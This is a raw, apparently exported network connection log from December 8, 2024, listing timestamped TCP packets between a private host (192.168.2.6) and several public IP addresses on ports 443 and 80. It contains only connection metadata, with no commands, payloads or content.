Dec 8, 2024 13:31:17.718403101 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.718419075 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.718472958 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.718480110 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.718519926 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.718545914 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.731813908 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.731836081 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.731878042 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.731888056 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.731920004 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.731940031 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.747384071 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.747400999 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.747457027 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.747466087 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.747513056 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.761979103 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.761992931 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.762053967 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.762059927 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.762136936 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.776145935 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.776160955 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.776221037 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.776228905 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.776290894 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.782579899 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.782651901 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.782653093 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.782696009 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.782720089 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.782736063 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.782751083 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.782757998 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.825661898 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.825707912 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.825807095 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.826885939 CET	49732	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.826909065 CET	443	49732	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.827155113 CET	49732	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.827631950 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.827644110 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.827717066 CET	49732	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.827733040 CET	443	49732	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.830394983 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.830440998 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.830576897 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.830845118 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.830866098 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.835006952 CET	49734	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.835016966 CET	443	49734	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.835124969 CET	49734	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.835257053 CET	49734	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.835264921 CET	443	49734	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.835565090 CET	49735	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.835575104 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.835660934 CET	49735	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.835766077 CET	49735	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.835783958 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:18.185575962 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:18.185731888 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:18.188925982 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:18.309437037 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:18.645587921 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:18.645734072 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:18.648529053 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:18.658303976 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:18.658366919 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:18.769859076 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:18.780838966 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:18.780864954 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:18.781265974 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:18.781272888 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:18.790962934 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:18.791043043 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:18.795025110 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:18.795105934 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:18.795809031 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:18.795875072 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:18.797616005 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:18.797672987 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:18.797734976 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:18.797796011 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.096910954 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.096932888 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.096975088 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.097017050 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.105528116 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.225050926 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.236821890 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.236841917 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.236974955 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.236989021 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.237190962 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.237245083 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.238068104 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.238094091 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.238326073 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.238334894 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.238367081 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.238476992 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.238517046 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.238523006 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.238776922 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.238789082 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.239095926 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.239095926 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.239135027 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.239172935 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.239180088 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.239183903 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.239188910 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.239272118 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.239278078 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.239309072 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.239442110 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.239507914 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.283344030 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.283345938 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.365417957 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:19.365442038 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:19.365457058 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:19.365510941 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:19.365536928 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:19.365551949 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:19.365582943 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:19.526838064 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:19.526915073 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:19.526918888 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:19.526962996 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:19.527106047 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:19.527124882 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:19.527134895 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:19.527167082 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:19.542766094 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.543442965 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.543473959 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.543998957 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.544004917 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.545380116 CET	443	49732	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.545392990 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.545712948 CET	49732	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.545730114 CET	443	49732	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.546483994 CET	49732	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.546488047 CET	443	49732	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.546931982 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.546957970 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.547472000 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.547478914 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.549591064 CET	443	49734	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.550025940 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.550098896 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.550103903 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.550170898 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.550321102 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.550388098 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.550403118 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.550442934 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.550460100 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.550463915 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.550509930 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.550870895 CET	49734	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.550884962 CET	443	49734	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.551434040 CET	49734	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.551439047 CET	443	49734	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.551584005 CET	49735	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.551594019 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.552017927 CET	49735	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.552022934 CET	443	49735	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.557069063 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.557115078 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.557151079 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.557193041 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.559343100 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:19.602062941 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602086067 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602103949 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602121115 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.602160931 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.602170944 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602214098 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.602430105 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602452040 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602468967 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602514982 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.602524996 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602539062 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.602569103 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.602718115 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602744102 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602761984 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602809906 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.602828026 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.602845907 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.602864981 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.619729996 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.619755983 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.619771004 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.619784117 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.619826078 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.619832039 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.619877100 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.671246052 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.671267986 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.671289921 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.671299934 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.671309948 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.671345949 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.678499937 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:19.703346014 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.703356028 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.703408957 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.703418016 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.703622103 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.720338106 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.720387936 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.790623903 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.790647030 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.790694952 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.790705919 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.790756941 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.790771961 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.791186094 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.791210890 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.791261911 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.791285992 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.791301966 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.791335106 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.793740988 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.793767929 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.793812990 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.793823004 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.793859005 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.793875933 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.800349951 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.800390005 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.800427914 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.800435066 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.800497055 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.839967966 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.839989901 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.840039968 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.840051889 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.840101004 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.840101004 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.844943047 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.844966888 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.845010042 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.845017910 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.845053911 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.848181963 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.848201990 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.848267078 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.848273993 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.848531961 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.850045919 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.850068092 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.850126028 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.850137949 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.850158930 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.850182056 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.871366978 CET	443	49705	173.222.162.64	192.168.2.6
Dec 8, 2024 13:31:19.871440887 CET	49705	443	192.168.2.6	173.222.162.64
Dec 8, 2024 13:31:19.875420094 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.875515938 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.875523090 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.875559092 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.897731066 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.897800922 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.897809982 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.897857904 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.927052975 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.927124023 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.927133083 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.927217960 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.949337006 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.949394941 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.949403048 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.949440956 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.962591887 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.962630987 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.962660074 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.962670088 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.962697029 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.962712049 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.963848114 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.963875055 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.963906050 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.963913918 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.963943005 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.963958979 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.964788914 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.964812040 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.964843035 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.964850903 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.964880943 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.964888096 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.966655970 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.966686964 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.966731071 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.966737032 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:19.966756105 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.966783047 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:19.979157925 CET	443	49732	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.979217052 CET	443	49732	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.979406118 CET	49732	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.980835915 CET	49732	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.980854988 CET	443	49732	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.980865955 CET	49732	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.980871916 CET	443	49732	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.983072996 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.983108997 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.983154058 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.983175993 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.983190060 CET	443	49734	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.983217955 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.983253956 CET	443	49734	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.983465910 CET	49734	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.984081984 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.984102964 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.984105110 CET	49736	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.984132051 CET	443	49736	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.984146118 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.984179974 CET	49736	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.984183073 CET	443	49733	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.984364033 CET	49733	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.984498024 CET	49736	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.984508991 CET	443	49736	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.984622002 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.984630108 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.984643936 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.984774113 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.984802008 CET	443	49731	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.984838963 CET	49731	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.986385107 CET	49734	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.986390114 CET	443	49734	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.986439943 CET	49734	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:19.986443043 CET	443	49734	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:19.987494946 CET	443	49733	13.107.246.63	192.168.2.6
